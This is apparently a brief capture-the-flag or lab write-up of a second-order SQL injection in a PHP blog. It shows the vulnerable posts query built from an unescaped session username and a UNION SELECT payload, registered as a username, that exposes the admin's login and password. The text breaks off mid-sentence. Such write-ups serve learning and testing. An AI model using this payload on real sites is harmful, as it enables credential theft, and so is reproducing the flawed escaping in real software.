# Injections

Every parameter except session[‘username’] in queries was escaped with mysqli_real_escape.
This parameter was used for querying all posts of logged user.
When registering a new acc it was set to mysqli_real_escape_sgtring($_POST[‘uname’]),
although when logging in it was set to username from db which is unescaped.

When viewing posts only 3 values were passed to html tough - title, content, author
table columns were ordered this:
```
| id | title | content | date | author |
```
and the query was
```
"SELECT * FROM posts WHERE author = '". $_SESSION['username'] ."
```
so I had to register new account whith username
```
' UNION SELECT 1, password, login, 4, 5 where role=1 -- asdf
```
when registered, session[‘username’] was set to escaped value of username
so i had to relog. Then it was set to unescaped, clicking onto view posts,
username and password of admin showed up yay -